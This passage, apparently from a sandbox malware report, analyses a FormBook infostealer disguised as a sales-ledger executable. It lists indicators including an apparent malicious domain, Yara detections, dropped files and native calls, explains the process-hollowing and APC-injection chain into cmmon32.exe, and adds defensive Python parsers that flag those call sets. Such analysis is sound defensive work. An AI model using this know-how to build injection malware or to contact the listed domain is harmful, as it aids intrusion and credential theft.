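Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://www.nirsoft.net/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmp String found in binary or memory: http://www.seniorlivingcaelderly.com
Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmp String found in binary or memory: http://www.seniorlivingcaelderly.com/suod/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: powershell.exe, 00000016.00000003.399833270.0000000005A8D000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0C
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/
"""

if __name__ == "__main__":
    for bucket, urls in triage_urls(SAMPLE_LINES).items():
        for url, names in urls.items():
            print(f"{bucket:8} {url}  <- {', '.join(names)}")
```

On this excerpt the review bucket holds the seniorlivingcaelderly.com entries (held by explorer.exe and cmmon32.exe only) and the truncated `https://go.micro` from powershell.exe, which an analyst still has to dismiss by hand. Read the mangled bucket too: a lookalike that appends labels to an allowlisted host lands there as well, so it is a list to skim, not to discard.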

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\cmmon32.exe Dropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini
Source: C:\Windows\SysWOW64\cmmon32.exe Dropped file: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041A070 NtClose, 24_2_0041A070
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041A120 NtAllocateVirtualMemory, 24_2_0041A120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00419F40 NtCreateFile, 24_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00419FF0 NtReadFile, 24_2_00419FF0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041A06C NtClose, 24_2_0041A06C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041A11A NtAllocateVirtualMemory, 24_2_0041A11A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239910 NtAdjustPrivilegesToken,LdrInitializeThunk, 24_2_01239910
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012399A0 NtCreateSection,LdrInitializeThunk, 24_2_012399A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239860 NtQuerySystemInformation,LdrInitializeThunk, 24_2_01239860
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239840 NtDelayExecution,LdrInitializeThunk, 24_2_01239840
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012398F0 NtReadVirtualMemory,LdrInitializeThunk, 24_2_012398F0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A20 NtResumeThread,LdrInitializeThunk, 24_2_01239A20
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A00 NtProtectVirtualMemory,LdrInitializeThunk, 24_2_01239A00
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A50 NtCreateFile,LdrInitializeThunk, 24_2_01239A50
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239540 NtReadFile,LdrInitializeThunk, 24_2_01239540
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012395D0 NtClose,LdrInitializeThunk, 24_2_012395D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239710 NtQueryInformationToken,LdrInitializeThunk, 24_2_01239710
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012397A0 NtUnmapViewOfSection,LdrInitializeThunk, 24_2_012397A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239780 NtMapViewOfSection,LdrInitializeThunk, 24_2_01239780
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239660 NtAllocateVirtualMemory,LdrInitializeThunk, 24_2_01239660
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012396E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_012396E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239950 NtQueueApcThread, 24_2_01239950
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012399D0 NtCreateProcessEx, 24_2_012399D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239820 NtEnumerateKey, 24_2_01239820
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123B040 NtSuspendThread, 24_2_0123B040
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012398A0 NtWriteVirtualMemory, 24_2_012398A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239B00 NtSetValueKey, 24_2_01239B00
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123A3B0 NtGetContextThread, 24_2_0123A3B0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A10 NtQuerySection, 24_2_01239A10
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A80 NtOpenDirectoryObject, 24_2_01239A80
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239520 NtWaitForSingleObject, 24_2_01239520
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123AD30 NtSetContextThread, 24_2_0123AD30
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239560 NtWriteFile, 24_2_01239560
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012395F0 NtQueryInformationFile, 24_2_012395F0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239730 NtQueryVirtualMemory, 24_2_01239730
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123A710 NtOpenProcessToken, 24_2_0123A710
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239760 NtOpenProcess, 24_2_01239760
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123A770 NtOpenThread, 24_2_0123A770
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239770 NtSetInformationFile, 24_2_01239770
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239FE0 NtCreateMutant, 24_2_01239FE0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239610 NtEnumerateValueKey, 24_2_01239610
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239670 NtQueryInformationProcess, 24_2_01239670
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239650 NtQueryValueKey, 24_2_01239650
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012396D0 NtCreateKey, 24_2_012396D0
Source: C:\Windows\explorer.exe Code function: 25_2_061C5A72 NtCreateFile,NtReadFile,NtClose, 25_2_061C5A72
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D095D0 NtClose,LdrInitializeThunk, 32_2_04D095D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09540 NtReadFile,LdrInitializeThunk, 32_2_04D09540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09560 NtWriteFile,LdrInitializeThunk, 32_2_04D09560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D096D0 NtCreateKey,LdrInitializeThunk, 32_2_04D096D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D096E0 NtFreeVirtualMemory,LdrInitializeThunk, 32_2_04D096E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09650 NtQueryValueKey,LdrInitializeThunk, 32_2_04D09650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09660 NtAllocateVirtualMemory,LdrInitializeThunk, 32_2_04D09660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09610 NtEnumerateValueKey,LdrInitializeThunk, 32_2_04D09610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09FE0 NtCreateMutant,LdrInitializeThunk, 32_2_04D09FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09780 NtMapViewOfSection,LdrInitializeThunk, 32_2_04D09780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09770 NtSetInformationFile,LdrInitializeThunk, 32_2_04D09770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09710 NtQueryInformationToken,LdrInitializeThunk, 32_2_04D09710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09840 NtDelayExecution,LdrInitializeThunk, 32_2_04D09840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09860 NtQuerySystemInformation,LdrInitializeThunk, 32_2_04D09860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D099A0 NtCreateSection,LdrInitializeThunk, 32_2_04D099A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 32_2_04D09910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A50 NtCreateFile,LdrInitializeThunk, 32_2_04D09A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D095F0 NtQueryInformationFile, 32_2_04D095F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0AD30 NtSetContextThread, 32_2_04D0AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09520 NtWaitForSingleObject, 32_2_04D09520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09670 NtQueryInformationProcess, 32_2_04D09670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D097A0 NtUnmapViewOfSection, 32_2_04D097A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0A770 NtOpenThread, 32_2_04D0A770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09760 NtOpenProcess, 32_2_04D09760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0A710 NtOpenProcessToken, 32_2_04D0A710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09730 NtQueryVirtualMemory, 32_2_04D09730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D098F0 NtReadVirtualMemory, 32_2_04D098F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D098A0 NtWriteVirtualMemory, 32_2_04D098A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0B040 NtSuspendThread, 32_2_04D0B040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09820 NtEnumerateKey, 32_2_04D09820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D099D0 NtCreateProcessEx, 32_2_04D099D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09950 NtQueueApcThread, 32_2_04D09950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A80 NtOpenDirectoryObject, 32_2_04D09A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A10 NtQuerySection, 32_2_04D09A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A00 NtProtectVirtualMemory, 32_2_04D09A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A20 NtResumeThread, 32_2_04D09A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0A3B0 NtGetContextThread, 32_2_04D0A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09B00 NtSetValueKey, 32_2_04D09B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A070 NtClose, 32_2_02B2A070
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A120 NtAllocateVirtualMemory, 32_2_02B2A120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B29FF0 NtReadFile, 32_2_02B29FF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B29F40 NtCreateFile, 32_2_02B29F40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A06C NtClose, 32_2_02B2A06C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2A11A NtAllocateVirtualMemory, 32_2_02B2A11A
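Read as a set rather than a list, the calls above are the injection chain the report's header summarises: NtCreateSection and NtMapViewOfSection (mapping memory into another process), NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread (process hollowing), and NtQueueApcThread (APC injection), present both in the Temp copy of the sample (index 24) and in cmmon32.exe (index 32), while explorer.exe (index 25) shows only file I/O. The script below, an added example and not a sandbox feature, groups the Nt* calls per process index and flags those clusters. The technique groupings are this example's assumption, named after the header's own signatures; the input is a constructed excerpt copied from the lines above.

```python
"""Group the native (Nt*) calls a sandbox attributes to each process and flag
the call sets that make up an injection chain.

Added example written for this report, not a sandbox feature. The TECHNIQUES
groupings are this example's assumption, named after the report header's own
signatures. SAMPLE_LINES is a constructed excerpt copied from the report's
"Contains functionality to call native functions" findings.
"""
import re
from collections import defaultdict

# "Source: <image> Code function: <idx>_<run>_<addr> <Api>,<Api>, <idx>_<run>_<addr>"
# <idx> is the sandbox's process index (24 = Temp copy of the sample,
# 25 = explorer.exe, 32 = cmmon32.exe in this report).
CODE_FUNCTION_RE = re.compile(
    r"^Source: (?P<image>.+?) Code function: "
    r"(?P<idx>\d+)_\d+_(?P<addr>[0-9A-Fa-f]+) (?P<apis>\S+) (?P=idx)_\d+_(?P=addr)$")

TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "APC thread injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "section mapping into another process": {"NtCreateSection", "NtMapViewOfSection"},
}


def parse_native_calls(lines):
    """Return (index -> image path, index -> set of Nt* APIs) from report lines."""
    images, calls = {}, defaultdict(set)
    for line in lines:
        m = CODE_FUNCTION_RE.match(line.strip())
        if not m:
            continue  # 'Detected potential crypto function' lines carry no API list
        idx = int(m["idx"])
        images[idx] = m["image"]
        # Drops the empty token after the trailing comma and helpers like LdrInitializeThunk.
        calls[idx] |= {api for api in m["apis"].split(",") if api.startswith("Nt")}
    return images, dict(calls)


def flag_techniques(apis):
    """Names of every technique whose full API set is present in `apis`."""
    return [name for name, needed in TECHNIQUES.items() if needed <= apis]


def triage(text):
    """Per process index: image, sorted Nt* calls, and the techniques they add up to."""
    images, calls = parse_native_calls(text.splitlines())
    return {idx: {"image": images[idx], "nt_calls": sorted(apis),
                  "techniques": flag_techniques(apis)}
            for idx, apis in calls.items()}


# Constructed excerpt of the report's own lines (a representative subset).
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041A070 NtClose, 24_2_0041A070
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012399A0 NtCreateSection,LdrInitializeThunk, 24_2_012399A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239A20 NtResumeThread,LdrInitializeThunk, 24_2_01239A20
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012397A0 NtUnmapViewOfSection,LdrInitializeThunk, 24_2_012397A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239780 NtMapViewOfSection,LdrInitializeThunk, 24_2_01239780
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01239950 NtQueueApcThread, 24_2_01239950
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012398A0 NtWriteVirtualMemory, 24_2_012398A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123AD30 NtSetContextThread, 24_2_0123AD30
Source: C:\Windows\explorer.exe Code function: 25_2_061C5A72 NtCreateFile,NtReadFile,NtClose, 25_2_061C5A72
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D099A0 NtCreateSection,LdrInitializeThunk, 32_2_04D099A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09780 NtMapViewOfSection,LdrInitializeThunk, 32_2_04D09780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D0AD30 NtSetContextThread, 32_2_04D0AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D097A0 NtUnmapViewOfSection, 32_2_04D097A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D098A0 NtWriteVirtualMemory, 32_2_04D098A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09950 NtQueueApcThread, 32_2_04D09950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D09A20 NtResumeThread, 32_2_04D09A20
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_0057A5EC 0_2_0057A5EC
"""

if __name__ == "__main__":
    for idx, info in sorted(triage(SAMPLE_LINES).items()):
        print(f"[{idx}] {info['image']}")
        print(f"     Nt* calls : {', '.join(info['nt_calls'])}")
        print(f"     techniques: {info['techniques'] or 'none flagged'}")
```

The check is deliberately set-based: a single NtWriteVirtualMemory is unremarkable, while the complete hollowing set in one process is not. cmmon32.exe carrying the same set as the sample's Temp copy is the point to note; it is a Microsoft binary that has no business unmapping sections or setting thread contexts, so the calls belong to the payload injected into it.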
Detected potential crypto function
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_0057A5EC 0_2_0057A5EC
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_01060640 0_2_01060640
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_010609AE 0_2_010609AE
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_01061748 0_2_01061748
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_01061BE0 0_2_01061BE0
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_010617F9 0_2_010617F9
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E200B8 0_2_04E200B8
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E20E60 0_2_04E20E60
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E20E70 0_2_04E20E70
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00401030 24_2_00401030
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D905 24_2_0041D905
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041EB37 24_2_0041EB37
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041E3A2 24_2_0041E3A2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041E41B 24_2_0041E41B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D4D0 24_2_0041D4D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041DCBC 24_2_0041DCBC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00402D90 24_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00409E40 24_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00409E3E 24_2_00409E3E
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041DF3F 24_2_0041DF3F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041DFCD 24_2_0041DFCD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00402FB0 24_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0078A5EC 24_2_0078A5EC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01214120 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FF900 24_2_011FF900
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012CE824 24_2_012CE824
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1002 24_2_012B1002
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C20A8 24_2_012C20A8
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B090 24_2_0120B090
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C28EC 24_2_012C28EC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C2B28 24_2_012C2B28
